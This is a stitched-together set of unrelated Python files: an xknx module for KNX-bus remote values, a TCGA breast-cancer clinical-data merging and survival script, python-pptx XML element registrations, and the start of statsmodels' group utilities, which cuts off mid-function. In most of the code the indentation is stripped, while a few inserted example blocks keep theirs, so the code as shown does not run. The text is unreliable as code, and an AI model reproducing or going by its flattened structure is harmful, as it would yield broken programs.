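# A hypothetical loader for later analysis could look like (file name assumed):
#
#     import numpy as np
#     samples = np.loadtxt('dataswipe.csv', delimiter=',')
#     timestamps, features = samples[:, 0], samples[:, 1:]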
|
|
"""
Module for managing a remote value on the KNX bus.
Remote value can be:
- a group address for writing a KNX value,
- a group address for reading a KNX value,
- or a group of both representing the same value.
"""
from __future__ import annotations
from abc import ABC, abstractmethod
import logging
from typing import TYPE_CHECKING, Awaitable, Callable, Generic, Iterator, TypeVar, Union
from xknx.dpt.dpt import DPTArray, DPTBinary
from xknx.exceptions import ConversionError, CouldNotParseTelegram
from xknx.telegram import GroupAddress, Telegram
from xknx.telegram.address import (
DeviceGroupAddress,
InternalGroupAddress,
parse_device_group_address,
)
from xknx.telegram.apci import GroupValueResponse, GroupValueWrite
if TYPE_CHECKING:
from xknx.telegram.address import DeviceAddressableType
from xknx.xknx import XKNX
logger = logging.getLogger("xknx.log")
AsyncCallbackType = Callable[[], Awaitable[None]]
DPTPayloadType = TypeVar(
"DPTPayloadType", DPTArray, DPTBinary, Union[DPTArray, DPTBinary]
)
GroupAddressesType = Union["DeviceAddressableType", list["DeviceAddressableType"]]
ValueType = TypeVar("ValueType")
class RemoteValue(ABC, Generic[DPTPayloadType, ValueType]):
"""Class for managing remote knx value."""
def __init__(
self,
xknx: XKNX,
group_address: GroupAddressesType | None = None,
group_address_state: GroupAddressesType | None = None,
sync_state: bool | int | float | str = True,
device_name: str | None = None,
feature_name: str | None = None,
after_update_cb: AsyncCallbackType | None = None,
):
"""Initialize RemoteValue class."""
self.xknx: XKNX = xknx
self.passive_group_addresses: list[DeviceGroupAddress] = []
def unpack_group_addresses(
addresses: GroupAddressesType | None,
) -> DeviceGroupAddress | None:
"""Parse group addresses and assign passive addresses when given."""
if addresses is None:
return None
if not isinstance(addresses, list):
return parse_device_group_address(addresses)
active, *passive = map(parse_device_group_address, addresses)
self.passive_group_addresses.extend(passive) # type: ignore
return active
self.group_address = unpack_group_addresses(group_address)
self.group_address_state = unpack_group_addresses(group_address_state)
self.device_name: str = "Unknown" if device_name is None else device_name
self.feature_name: str = "Unknown" if feature_name is None else feature_name
self._value: ValueType | None = None
self.telegram: Telegram | None = None
self.after_update_cb: AsyncCallbackType | None = after_update_cb
if sync_state and self.group_address_state:
self.xknx.state_updater.register_remote_value(
self, tracker_options=sync_state
)
def __del__(self) -> None:
"""Destructor. Removing self from StateUpdater if was registered."""
try:
self.xknx.state_updater.unregister_remote_value(self)
except (KeyError, AttributeError):
# KeyError if it was never added to StateUpdater
# AttributeError if instantiation failed (tests mostly)
pass
@property
def value(self) -> ValueType | None:
"""Get current value."""
return self._value
@value.setter
def value(self, value: ValueType | None) -> None:
"""Set new value without creating a Telegram or calling after_update_cb. Raises ConversionError on invalid value."""
if value is not None:
# raises ConversionError on invalid value
self.to_knx(value)
self._value = value
async def update_value(self, value: ValueType | None) -> None:
"""Set new value without creating a Telegram. Awaits after_update_cb. Raises ConversionError on invalid value."""
self.value = value
if self.after_update_cb is not None:
await self.after_update_cb()
@property
def initialized(self) -> bool:
"""Evaluate if remote value is initialized with group address."""
return bool(
self.group_address_state
or self.group_address
or self.passive_group_addresses
)
@property
def readable(self) -> bool:
"""Evaluate if remote value should be read from bus."""
return bool(self.group_address_state)
@property
def writable(self) -> bool:
"""Evaluate if remote value has a group_address set."""
return bool(self.group_address)
def has_group_address(self, group_address: DeviceGroupAddress) -> bool:
"""Test if device has given group address."""
def remote_value_addresses() -> Iterator[DeviceGroupAddress | None]:
"""Yield all group_addresses."""
yield self.group_address
yield self.group_address_state
yield from self.passive_group_addresses
return group_address in remote_value_addresses()
@abstractmethod
def payload_valid(self, payload: DPTArray | DPTBinary | None) -> DPTPayloadType:
"""Return payload if telegram payload may be parsed - to be implemented in derived class."""
raise CouldNotParseTelegram("Payload invalid", payload=str(payload))
@abstractmethod
def from_knx(self, payload: DPTPayloadType) -> ValueType:
"""Convert current payload to value - to be implemented in derived class."""
@abstractmethod
def to_knx(self, value: ValueType) -> DPTPayloadType:
"""Convert value to payload - to be implemented in derived class."""
async def process(self, telegram: Telegram, always_callback: bool = False) -> bool:
"""Process incoming or outgoing telegram."""
if not isinstance(
telegram.destination_address, (GroupAddress, InternalGroupAddress)
) or not self.has_group_address(telegram.destination_address):
return False
if not isinstance(
telegram.payload,
(
GroupValueWrite,
GroupValueResponse,
),
):
raise CouldNotParseTelegram(
"payload not a GroupValueWrite or GroupValueResponse",
payload=str(telegram.payload),
destination_address=str(telegram.destination_address),
source_address=str(telegram.source_address),
device_name=self.device_name,
feature_name=self.feature_name,
)
try:
_new_payload = self.payload_valid(telegram.payload.value)
decoded_payload = self.from_knx(_new_payload)
except (ConversionError, CouldNotParseTelegram) as err:
logger.warning(
"Can not process %s for %s - %s: %s",
telegram,
self.device_name,
self.feature_name,
err,
)
return False
self.xknx.state_updater.update_received(self)
if self._value is None or always_callback or self._value != decoded_payload:
self._value = decoded_payload
self.telegram = telegram
if self.after_update_cb is not None:
await self.after_update_cb()
return True
async def _send(
self, payload: DPTArray | DPTBinary, response: bool = False
) -> None:
"""Send payload as telegram to KNX bus."""
if self.group_address is not None:
telegram = Telegram(
destination_address=self.group_address,
payload=(
GroupValueResponse(payload)
if response
else GroupValueWrite(payload)
),
source_address=self.xknx.current_address,
)
await self.xknx.telegrams.put(telegram)
async def set(self, value: ValueType, response: bool = False) -> None:
"""Set new value."""
if not self.initialized:
logger.info(
"Setting value of uninitialized device: %s - %s (value: %s)",
self.device_name,
self.feature_name,
value,
)
return
if not self.writable:
logger.warning(
"Attempted to set value for non-writable device: %s - %s (value: %s)",
self.device_name,
self.feature_name,
value,
)
return
payload = self.to_knx(value)
await self._send(payload, response)
# self._value is set and after_update_cb() called when the outgoing telegram is processed.
async def respond(self) -> None:
"""Send current payload as GroupValueResponse telegram to KNX bus."""
if self._value is not None:
payload = self.to_knx(self._value)
await self._send(payload, response=True)
async def read_state(self, wait_for_result: bool = False) -> None:
"""Send GroupValueRead telegram for state address to KNX bus."""
if self.group_address_state is not None:
# pylint: disable=import-outside-toplevel
# TODO: send a ReadRequest and start a timeout from here instead of ValueReader
# cancel timeout form process(); delete ValueReader
from xknx.core import ValueReader
value_reader = ValueReader(self.xknx, self.group_address_state)
if wait_for_result:
telegram = await value_reader.read()
if telegram is not None:
await self.process(telegram)
else:
logger.warning(
"Could not sync group address '%s' (%s - %s)",
self.group_address_state,
self.device_name,
self.feature_name,
)
else:
await value_reader.send_group_read()
@property
def unit_of_measurement(self) -> str | None:
"""Return the unit of measurement."""
return None
def group_addr_str(self) -> str:
"""Return object as readable string."""
return (
f"<{self.group_address}, "
f"{self.group_address_state}, "
f"{list(map(str, self.passive_group_addresses))}, "
f"{self.value.__repr__()} />"
)
def __str__(self) -> str:
"""Return object as string representation."""
return (
f"<{self.__class__.__name__} "
f'device_name="{self.device_name}" '
f'feature_name="{self.feature_name}" '
f"{self.group_addr_str()} />"
)
def __eq__(self, other: object) -> bool:
"""Equal operator."""
for key, value in self.__dict__.items():
if key == "after_update_cb":
continue
if key not in other.__dict__:
return False
if other.__dict__[key] != value:
return False
for key, value in other.__dict__.items():
if key == "after_update_cb":
continue
if key not in self.__dict__:
return False
return True
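# A minimal illustrative subclass (hypothetical, not part of xknx) showing how the
# abstract methods above are typically implemented for a simple boolean value,
# assuming DPTBinary(1)/DPTBinary(0) encode on/off.
class RemoteValueOnOff(RemoteValue[DPTBinary, bool]):
    """Hypothetical example of a concrete RemoteValue for a boolean payload."""

    def payload_valid(self, payload: DPTArray | DPTBinary | None) -> DPTBinary:
        """Accept only DPTBinary payloads for this value."""
        if isinstance(payload, DPTBinary):
            return payload
        raise CouldNotParseTelegram("payload invalid", payload=str(payload))

    def to_knx(self, value: bool) -> DPTBinary:
        """Convert boolean value to its KNX payload."""
        return DPTBinary(1) if value else DPTBinary(0)

    def from_knx(self, payload: DPTBinary) -> bool:
        """Convert KNX payload back to a boolean value."""
        return payload.value != 0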
|
|
## A script for extracting info about the patients used in the analysis
## Load necessary modules
from rpy2 import robjects as ro
import numpy as np
import os
ro.r('library(survival)')
import re
##This call will only work if you are running python from the command line.
##If you are not running from the command line manually type in your paths.
BASE_DIR = os.path.dirname(os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__)))))
## There were three clinical files with non-redundant data. V4.0 is in general the most up to date, but it is possible
## for data in the other files to be more up to date. As a result, clinical data will be merged.
f=open(os.path.join(BASE_DIR,'tcga_data','BRCA','clinical','nationwidechildrens.org_clinical_follow_up_v4.0_brca.txt'))
##get the column indexes needed
columns=f.readline().split('\t')
patient_column=columns.index('bcr_patient_barcode')
alive_column=columns.index('last_contact_days_to')
death_column=columns.index('death_days_to')
f.readline()
f.readline()
data=[i.split('\t') for i in f]
## A patient can be listed multiple times in the file. The most recent listing (furthest down in the file) contains the most recent
## follow up data. This code checks whether the patient has already been loaded into the list and, if so, keeps the more recent data.
## This requires an empty value in the list initialization.
## Data is: [[Patient ID, time(days), Vital status],[Patient ID, time(days), Vital status],...]
clinical1=[['','','']]
for i in data:
if clinical1[-1][0]==i[patient_column]:
if re.search('^[0-9]+$',i[alive_column]):
clinical1[-1]=[i[patient_column],int(i[alive_column]),'Alive']
elif re.search('^[0-9]+$',i[death_column]):
clinical1[-1]=[i[patient_column],int(i[death_column]),'Dead']
else:
pass
else:
if re.search('^[0-9]+$',i[alive_column]):
clinical1.append([i[patient_column],int(i[alive_column]),'Alive'])
elif re.search('^[0-9]+$',i[death_column]):
clinical1.append([i[patient_column],int(i[death_column]),'Dead'])
else:
pass
## Removing the empty value.
clinical1=clinical1[1:]
f=open(os.path.join(BASE_DIR,'tcga_data','BRCA','clinical','nationwidechildrens.org_clinical_follow_up_v2.1_brca.txt'))
##get the column indexes needed
columns=f.readline().split('\t')
patient_column=columns.index('bcr_patient_barcode')
alive_column=columns.index('last_contact_days_to')
death_column=columns.index('death_days_to')
f.readline()
f.readline()
data=[i.split('\t') for i in f]
clinical2=[['','','']]
for i in data:
if clinical2[-1][0]==i[patient_column]:
if re.search('^[0-9]+$',i[alive_column]):
clinical2[-1]=[i[patient_column],int(i[alive_column]),'Alive']
elif re.search('^[0-9]+$',i[death_column]):
clinical2[-1]=[i[patient_column],int(i[death_column]),'Dead']
else:
pass
else:
if re.search('^[0-9]+$',i[alive_column]):
clinical2.append([i[patient_column],int(i[alive_column]),'Alive'])
elif re.search('^[0-9]+$',i[death_column]):
clinical2.append([i[patient_column],int(i[death_column]),'Dead'])
else:
pass
##removing the empty value
clinical2=clinical2[1:]
##merging the data
new_clinical=[]
for i in clinical2:
if i[0] not in [j[0] for j in clinical1]:
new_clinical.append(i)
else:
if i[1]<=clinical1[[j[0] for j in clinical1].index(i[0])][1]:
new_clinical.append(clinical1[[j[0] for j in clinical1].index(i[0])])
else:
new_clinical.append(i)
for i in clinical1:
if i[0] not in [j[0] for j in new_clinical]:
new_clinical.append(i)
f=open(os.path.join(BASE_DIR,'tcga_data','BRCA','clinical','nationwidechildrens.org_clinical_follow_up_v1.5_brca.txt'))
##get the column indexes needed
columns=f.readline().split('\t')
patient_column=columns.index('bcr_patient_barcode')
alive_column=columns.index('last_contact_days_to')
death_column=columns.index('death_days_to')
f.readline()
f.readline()
data=[i.split('\t') for i in f]
clinical3=[['','','']]
for i in data:
if clinical3[-1][0]==i[patient_column]:
if re.search('^[0-9]+$',i[alive_column]):
clinical3[-1]=[i[patient_column],int(i[alive_column]),'Alive']
elif re.search('^[0-9]+$',i[death_column]):
clinical3[-1]=[i[patient_column],int(i[death_column]),'Dead']
else:
pass
else:
if re.search('^[0-9]+$',i[alive_column]):
clinical3.append([i[patient_column],int(i[alive_column]),'Alive'])
elif re.search('^[0-9]+$',i[death_column]):
clinical3.append([i[patient_column],int(i[death_column]),'Dead'])
else:
pass
##removing the empty value
clinical3=clinical3[1:]
##merging the data
newer_clinical=[]
for i in clinical3:
if i[0] not in [j[0] for j in new_clinical]:
newer_clinical.append(i)
else:
if i[1]<=new_clinical[[j[0] for j in new_clinical].index(i[0])][1]:
newer_clinical.append(new_clinical[[j[0] for j in new_clinical].index(i[0])])
else:
newer_clinical.append(i)
for i in new_clinical:
if i[0] not in [j[0] for j in newer_clinical]:
newer_clinical.append(i)
## Grade, sex, and age information were taken from the "clinical_patient" file. A dictionary was created for sex and grade.
more_clinical={}
grade_dict={}
grade_dict['Infiltrating Ductal Carcinoma']=1
grade_dict['Metaplastic Carcinoma']=3
grade_dict['Mucinous Carcinoma']=4
grade_dict['Medullary Carcinoma']=5
grade_dict['Infiltrating Lobular Carcinoma']=6
sex_dict={}
sex_dict['MALE']=0
sex_dict['FEMALE']=1
## The "clinical_patient" file can also contain patients not listed in the follow_up files.
## In these cases the clinical data for these patients gets appended to a new clinical list.
f=open(os.path.join(BASE_DIR,'tcga_data','BRCA','clinical','nationwidechildrens.org_clinical_patient_brca.txt'))
columns=f.readline().split('\t')
grade_column=columns.index('histological_type')
sex_column=columns.index('gender')
age_column=columns.index('age_at_diagnosis')
patient_column=columns.index('bcr_patient_barcode')
alive_column=columns.index('last_contact_days_to')
death_column=columns.index('death_days_to')
f.readline()
f.readline()
data=[i.split('\t') for i in f]
clinical4=[]
for i in data:
try:
more_clinical[i[patient_column]]=[grade_dict[i[grade_column]],sex_dict[i[sex_column]],int(i[age_column])]
if re.search('^[0-9]+$',i[alive_column]):
clinical4.append([i[patient_column],int(i[alive_column]),'Alive'])
elif re.search('^[0-9]+$',i[death_column]):
clinical4.append([i[patient_column],int(i[death_column]),'Dead'])
else:
pass
    except:
        ## skip patients with missing or malformed grade, sex, or age information
        pass
newest_clinical=[]
##It is possible that the clinical data in the clinical_patient file is more up to date than the follow_up files
##All the clinical data is merged checking which data is the most up to date
for i in clinical4:
if i[0] not in [j[0] for j in newer_clinical]:
newest_clinical.append(i)
else:
if i[1]<=newer_clinical[[j[0] for j in newer_clinical].index(i[0])][1]:
newest_clinical.append(newer_clinical[[j[0] for j in newer_clinical].index(i[0])])
else:
newest_clinical.append(i)
##also do the reverse since clinical can contain patients not included in clinical4
for i in newer_clinical:
if i[0] not in [j[0] for j in newest_clinical]:
newest_clinical.append(i)
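## The same "keep the record with the longest follow up" rule is applied three times
## above. Purely as an illustration (this helper is hypothetical and not used below),
## the merge of two lists of [Patient ID, time(days), Vital status] could be written once as:
def merge_follow_up(primary, secondary):
    ## entries from primary win ties against entries from secondary
    primary_ids = [entry[0] for entry in primary]
    merged = []
    for entry in secondary:
        if entry[0] not in primary_ids:
            merged.append(entry)
        else:
            match = primary[primary_ids.index(entry[0])]
            merged.append(match if entry[1] <= match[1] else entry)
    merged_ids = [entry[0] for entry in merged]
    for entry in primary:
        if entry[0] not in merged_ids:
            merged.append(entry)
    return merged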
## only patients who had a follow up time greater than 0 days are included in the analysis
clinical=[i for i in newest_clinical if i[1]>0]
final_clinical=[]
## A new list containing both follow up times and grade, sex, and age is constructed.
## Only patients with grade, sex, and age information are included.
## Data is [[Patient ID, time (days), vital status, grade, sex, age at diagnosis],...]
for i in clinical:
if i[0] in more_clinical:
final_clinical.append(i+more_clinical[i[0]])
## Need to map the miRNA files to the correct patients
## The necessary information is included in the FILE_SAMPLE_MAP.txt file
f=open(os.path.join(BASE_DIR,'tcga_data','BRCA','FILE_SAMPLE_MAP_mirna.txt'))
f.readline()
data=[i.strip().split() for i in f if i!='\n']
#### 01 indicates a primary tumor, and only primary tumors are included in this analysis
TCGA_to_mirna={}
for i in data:
##normalized files were used
if 'isoform.quantification' in i[0]:
if i[1].split('-')[3][:-1]=='01':
            ## reconstruct the patient barcode (e.g. "TCGA-XX-XXXX") from the first three fields of the sample barcode
            x='-'.join(i[1].split('-')[:3])
TCGA_to_mirna[x]=TCGA_to_mirna.get(x,[])+[i[0]]
clinical_and_files=[]
## I only care about patients that contained complete clinical information
for i in final_clinical:
if TCGA_to_mirna.has_key(i[0]):
## The miRNA files are added to the clinical list
## Data structure: [[Patient ID, time (days), vital status, grade, sex, age at diagnosis,[miRNA files]],...]
clinical_and_files.append(i+[TCGA_to_mirna[i[0]]])
else:
pass
##print average age at diagnosis
age=np.mean([i[5] for i in clinical_and_files])
##print number of males
males=len([i for i in clinical_and_files if i[4]==0])
##print number of females
females=len([i for i in clinical_and_files if i[4]==1])
##to get the median survival we need to call survfit from r
##prepare variables for R
ro.globalenv['times']=ro.IntVector([i[1] for i in clinical_and_files])
##need to create a dummy variable group
ro.globalenv['group']=ro.IntVector([0 for i in clinical_and_files])
##need a vector for deaths
death_dic={}
death_dic['Alive']=0
death_dic['Dead']=1
ro.globalenv['died']=ro.IntVector([death_dic[i[2]] for i in clinical_and_files])
res=ro.r('survfit(Surv(times,died) ~ as.factor(group))')
#the number of events(deaths) is the fourth column of the output
deaths=str(res).split('\n')[-2].strip().split()[3]
#the median survival time is the fifth column of the output
median=str(res).split('\n')[-2].strip().split()[4]
##write data to a file
f=open('patient_info.txt','w')
f.write('Average Age')
f.write('\t')
f.write('Males')
f.write('\t')
f.write('Females')
f.write('\t')
f.write('Deaths')
f.write('\t')
f.write('Median Survival')
f.write('\n')
f.write(str(age))
f.write('\t')
f.write(str(males))
f.write('\t')
f.write(str(females))
f.write('\t')
f.write(deaths)
f.write('\t')
f.write(median)
f.close()
|
|
# encoding: utf-8
"""
Initializes lxml parser and makes available a handful of functions that wrap
its typical uses.
"""
from __future__ import absolute_import
from lxml import etree
from .ns import NamespacePrefixedTag
# configure etree XML parser -------------------------------
element_class_lookup = etree.ElementNamespaceClassLookup()
oxml_parser = etree.XMLParser(remove_blank_text=True)
oxml_parser.set_element_class_lookup(element_class_lookup)
def parse_xml(xml):
"""
Return root lxml element obtained by parsing XML character string in
*xml*, which can be either a Python 2.x string or unicode.
"""
root_element = etree.fromstring(xml, oxml_parser)
return root_element
def register_element_cls(nsptagname, cls):
"""
Register *cls* to be constructed when the oxml parser encounters an
    element having name *nsptagname*. *nsptagname* is a string of the form
``nspfx:tagroot``, e.g. ``'w:document'``.
"""
nsptag = NamespacePrefixedTag(nsptagname)
namespace = element_class_lookup.get_namespace(nsptag.nsuri)
namespace[nsptag.local_part] = cls
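# Illustrative sketch (hypothetical, not part of python-pptx): a custom element
# class is a subclass of an lxml element base class and is registered for its
# namespace-prefixed tag name, after which the parser constructs instances of it
# for matching elements, e.g.:
#
#     class CT_Example(etree.ElementBase):
#         """Custom element class for a made-up ``a:example`` element."""
#
#     register_element_cls('a:example', CT_Example)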
from .chart.axis import (
CT_AxisUnit, CT_CatAx, CT_LblOffset, CT_Scaling, CT_TickLblPos,
CT_TickMark, CT_ValAx
)
register_element_cls('c:catAx', CT_CatAx)
register_element_cls('c:lblOffset', CT_LblOffset)
register_element_cls('c:majorTickMark', CT_TickMark)
register_element_cls('c:majorUnit', CT_AxisUnit)
register_element_cls('c:minorTickMark', CT_TickMark)
register_element_cls('c:minorUnit', CT_AxisUnit)
register_element_cls('c:scaling', CT_Scaling)
register_element_cls('c:tickLblPos', CT_TickLblPos)
register_element_cls('c:valAx', CT_ValAx)
from .chart.chart import (
CT_Chart, CT_ChartSpace, CT_ExternalData, CT_PlotArea, CT_Style
)
register_element_cls('c:chart', CT_Chart)
register_element_cls('c:chartSpace', CT_ChartSpace)
register_element_cls('c:externalData', CT_ExternalData)
register_element_cls('c:plotArea', CT_PlotArea)
register_element_cls('c:style', CT_Style)
from .chart.legend import CT_Legend, CT_LegendPos
register_element_cls('c:legend', CT_Legend)
register_element_cls('c:legendPos', CT_LegendPos)
from .chart.plot import (
CT_Area3DChart, CT_AreaChart, CT_BarChart, CT_BarDir, CT_DLblPos,
CT_DLbls, CT_GapAmount, CT_Grouping, CT_LineChart, CT_Overlap,
CT_PieChart
)
register_element_cls('c:area3DChart', CT_Area3DChart)
register_element_cls('c:areaChart', CT_AreaChart)
register_element_cls('c:barChart', CT_BarChart)
register_element_cls('c:barDir', CT_BarDir)
register_element_cls('c:dLblPos', CT_DLblPos)
register_element_cls('c:dLbls', CT_DLbls)
register_element_cls('c:gapWidth', CT_GapAmount)
register_element_cls('c:grouping', CT_Grouping)
register_element_cls('c:lineChart', CT_LineChart)
register_element_cls('c:overlap', CT_Overlap)
register_element_cls('c:pieChart', CT_PieChart)
from .chart.series import CT_SeriesComposite, CT_StrVal_NumVal_Composite
register_element_cls('c:pt', CT_StrVal_NumVal_Composite)
register_element_cls('c:ser', CT_SeriesComposite)
from .chart.shared import (
CT_Boolean, CT_Double, CT_Layout, CT_LayoutMode, CT_ManualLayout,
CT_NumFmt, CT_UnsignedInt
)
register_element_cls('c:autoUpdate', CT_Boolean)
register_element_cls('c:delete', CT_Boolean)
register_element_cls('c:idx', CT_UnsignedInt)
register_element_cls('c:invertIfNegative', CT_Boolean)
register_element_cls('c:layout', CT_Layout)
register_element_cls('c:manualLayout', CT_ManualLayout)
register_element_cls('c:max', CT_Double)
register_element_cls('c:min', CT_Double)
register_element_cls('c:numFmt', CT_NumFmt)
register_element_cls('c:order', CT_UnsignedInt)
register_element_cls('c:overlay', CT_Boolean)
register_element_cls('c:smooth', CT_Boolean)
register_element_cls('c:varyColors', CT_Boolean)
register_element_cls('c:x', CT_Double)
register_element_cls('c:xMode', CT_LayoutMode)
from .dml.color import (
CT_HslColor, CT_Percentage, CT_PresetColor, CT_SchemeColor,
CT_ScRgbColor, CT_SRgbColor, CT_SystemColor
)
register_element_cls('a:hslClr', CT_HslColor)
register_element_cls('a:lumMod', CT_Percentage)
register_element_cls('a:lumOff', CT_Percentage)
register_element_cls('a:prstClr', CT_PresetColor)
register_element_cls('a:schemeClr', CT_SchemeColor)
register_element_cls('a:scrgbClr', CT_ScRgbColor)
register_element_cls('a:srgbClr', CT_SRgbColor)
register_element_cls('a:sysClr', CT_SystemColor)
from .dml.fill import (
CT_Blip, CT_BlipFillProperties, CT_GradientFillProperties,
CT_GroupFillProperties, CT_NoFillProperties, CT_PatternFillProperties,
CT_RelativeRect, CT_SolidColorFillProperties
)
register_element_cls('a:blip', CT_Blip)
register_element_cls('a:blipFill', CT_BlipFillProperties)
register_element_cls('a:gradFill', CT_GradientFillProperties)
register_element_cls('a:grpFill', CT_GroupFillProperties)
register_element_cls('a:noFill', CT_NoFillProperties)
register_element_cls('a:pattFill', CT_PatternFillProperties)
register_element_cls('a:solidFill', CT_SolidColorFillProperties)
register_element_cls('a:srcRect', CT_RelativeRect)
from .parts.coreprops import CT_CoreProperties
register_element_cls('cp:coreProperties', CT_CoreProperties)
from .parts.presentation import (
CT_Presentation, CT_SlideId, CT_SlideIdList, CT_SlideMasterIdList,
CT_SlideMasterIdListEntry, CT_SlideSize
)
register_element_cls('p:presentation', CT_Presentation)
register_element_cls('p:sldId', CT_SlideId)
register_element_cls('p:sldIdLst', CT_SlideIdList)
register_element_cls('p:sldMasterId', CT_SlideMasterIdListEntry)
register_element_cls('p:sldMasterIdLst', CT_SlideMasterIdList)
register_element_cls('p:sldSz', CT_SlideSize)
from .parts.slide import CT_CommonSlideData, CT_Slide
register_element_cls('p:cSld', CT_CommonSlideData)
register_element_cls('p:sld', CT_Slide)
from .parts.slidelayout import CT_SlideLayout
register_element_cls('p:sldLayout', CT_SlideLayout)
from .parts.slidemaster import (
CT_SlideLayoutIdList, CT_SlideLayoutIdListEntry, CT_SlideMaster
)
register_element_cls('p:sldLayoutId', CT_SlideLayoutIdListEntry)
register_element_cls('p:sldLayoutIdLst', CT_SlideLayoutIdList)
register_element_cls('p:sldMaster', CT_SlideMaster)
from .shapes.autoshape import (
CT_GeomGuide, CT_GeomGuideList, CT_NonVisualDrawingShapeProps,
CT_PresetGeometry2D, CT_Shape, CT_ShapeNonVisual
)
register_element_cls('a:avLst', CT_GeomGuideList)
register_element_cls('a:gd', CT_GeomGuide)
register_element_cls('a:prstGeom', CT_PresetGeometry2D)
register_element_cls('p:cNvSpPr', CT_NonVisualDrawingShapeProps)
register_element_cls('p:nvSpPr', CT_ShapeNonVisual)
register_element_cls('p:sp', CT_Shape)
from .shapes.connector import CT_Connector, CT_ConnectorNonVisual
register_element_cls('p:cxnSp', CT_Connector)
register_element_cls('p:nvCxnSpPr', CT_ConnectorNonVisual)
from .shapes.graphfrm import (
CT_GraphicalObject, CT_GraphicalObjectData, CT_GraphicalObjectFrame,
CT_GraphicalObjectFrameNonVisual
)
register_element_cls('a:graphic', CT_GraphicalObject)
register_element_cls('a:graphicData', CT_GraphicalObjectData)
register_element_cls('p:graphicFrame', CT_GraphicalObjectFrame)
register_element_cls('p:nvGraphicFramePr', CT_GraphicalObjectFrameNonVisual)
from .shapes.groupshape import (
CT_GroupShape, CT_GroupShapeNonVisual, CT_GroupShapeProperties
)
register_element_cls('p:grpSp', CT_GroupShape)
register_element_cls('p:grpSpPr', CT_GroupShapeProperties)
register_element_cls('p:nvGrpSpPr', CT_GroupShapeNonVisual)
register_element_cls('p:spTree', CT_GroupShape)
from .shapes.picture import CT_Picture, CT_PictureNonVisual
register_element_cls('p:blipFill', CT_BlipFillProperties)
register_element_cls('p:nvPicPr', CT_PictureNonVisual)
register_element_cls('p:pic', CT_Picture)
from .shapes.shared import (
CT_ApplicationNonVisualDrawingProps, CT_LineProperties,
CT_NonVisualDrawingProps, CT_Placeholder, CT_Point2D, CT_PositiveSize2D,
CT_ShapeProperties, CT_Transform2D
)
register_element_cls('a:ext', CT_PositiveSize2D)
register_element_cls('a:ln', CT_LineProperties)
register_element_cls('a:off', CT_Point2D)
register_element_cls('a:xfrm', CT_Transform2D)
register_element_cls('c:spPr', CT_ShapeProperties)
register_element_cls('p:cNvPr', CT_NonVisualDrawingProps)
register_element_cls('p:nvPr', CT_ApplicationNonVisualDrawingProps)
register_element_cls('p:ph', CT_Placeholder)
register_element_cls('p:spPr', CT_ShapeProperties)
register_element_cls('p:xfrm', CT_Transform2D)
from .shapes.table import (
CT_Table, CT_TableCell, CT_TableCellProperties, CT_TableCol,
CT_TableGrid, CT_TableProperties, CT_TableRow
)
register_element_cls('a:gridCol', CT_TableCol)
register_element_cls('a:tbl', CT_Table)
register_element_cls('a:tblGrid', CT_TableGrid)
register_element_cls('a:tblPr', CT_TableProperties)
register_element_cls('a:tc', CT_TableCell)
register_element_cls('a:tcPr', CT_TableCellProperties)
register_element_cls('a:tr', CT_TableRow)
from .text import (
CT_Hyperlink, CT_RegularTextRun, CT_TextBody, CT_TextBodyProperties,
CT_TextCharacterProperties, CT_TextField, CT_TextFont, CT_TextLineBreak,
CT_TextNormalAutofit, CT_TextParagraph, CT_TextParagraphProperties,
CT_TextSpacing, CT_TextSpacingPercent, CT_TextSpacingPoint
)
register_element_cls('a:bodyPr', CT_TextBodyProperties)
register_element_cls('a:br', CT_TextLineBreak)
register_element_cls('a:defRPr', CT_TextCharacterProperties)
register_element_cls('a:endParaRPr', CT_TextCharacterProperties)
register_element_cls('a:fld', CT_TextField)
register_element_cls('a:hlinkClick', CT_Hyperlink)
register_element_cls('a:latin', CT_TextFont)
register_element_cls('a:lnSpc', CT_TextSpacing)
register_element_cls('a:normAutofit', CT_TextNormalAutofit)
register_element_cls('a:r', CT_RegularTextRun)
register_element_cls('a:p', CT_TextParagraph)
register_element_cls('a:pPr', CT_TextParagraphProperties)
register_element_cls('a:rPr', CT_TextCharacterProperties)
register_element_cls('a:spcAft', CT_TextSpacing)
register_element_cls('a:spcBef', CT_TextSpacing)
register_element_cls('a:spcPct', CT_TextSpacingPercent)
register_element_cls('a:spcPts', CT_TextSpacingPoint)
register_element_cls('a:txBody', CT_TextBody)
register_element_cls('c:txPr', CT_TextBody)
register_element_cls('p:txBody', CT_TextBody)
|
|
# -*- coding: utf-8 -*-
"""Tools for working with groups
This provides several functions to work with groups and a Group class that
keeps track of the different representations and has methods to work more
easily with groups.
Author: Josef Perktold,
Author: Nathaniel Smith, recipe for sparse_dummies on scipy user mailing list
Created on Tue Nov 29 15:44:53 2011 : sparse_dummies
Created on Wed Nov 30 14:28:24 2011 : combine_indices
changes: add Group class
Notes
~~~~~
This reverses the class I used before, where the class was for the data and
the group was auxiliary. Here, it is only the group, no data is kept.
sparse_dummies needs checking for corner cases, e.g.
what if a category level has zero elements? This can happen with subset
selection even if the original groups were defined as arange.
Not all methods and options have been tried out yet after refactoring
need more efficient loop if groups are sorted -> see GroupSorted.group_iter
"""
import numpy as np
from statsmodels.compatnp.np_compat import npc_unique
def combine_indices(groups, prefix='', sep='.', return_labels=False):
'''use np.unique to get integer group indices for product, intersection
'''
if isinstance(groups, tuple):
groups = np.column_stack(groups)
else:
groups = np.asarray(groups)
dt = groups.dtype
#print dt
is2d = (groups.ndim == 2) #need to store
if is2d:
ncols = groups.shape[1]
if not groups.flags.c_contiguous:
groups = np.array(groups, order='C')
groups_ = groups.view([('',groups.dtype)]*groups.shape[1])
else:
groups_ = groups
uni, uni_idx, uni_inv = npc_unique(groups_, return_index=True,
return_inverse=True)
if is2d:
uni = uni.view(dt).reshape(-1, ncols)
#avoiding a view would be
# for t in uni.dtype.fields.values():
# assert (t[0] == dt)
#
# uni.dtype = dt
# uni.shape = (uni.size//ncols, ncols)
if return_labels:
label = [(prefix+sep.join(['%s']*len(uni[0]))) % tuple(ii)
for ii in uni]
return uni_inv, uni_idx, uni, label
else:
return uni_inv, uni_idx, uni
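# Illustrative usage (mirroring the examples in the ``__main__`` block below);
# rows of a 2d ``groups`` array are treated as joint (product) categories:
#
#     >>> groups = np.array([[0, 1], [0, 0], [1, 1], [0, 1]])
#     >>> uni_inv, uni_idx, uni = combine_indices(groups)
#     >>> uni_inv            # integer code of each row's combination
#     array([1, 0, 2, 1])
#     >>> uni                # unique combinations, in code order
#     array([[0, 0],
#            [0, 1],
#            [1, 1]])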
#written for and used in try_covariance_grouploop.py
def group_sums(x, group, use_bincount=True):
'''simple bincount version, again
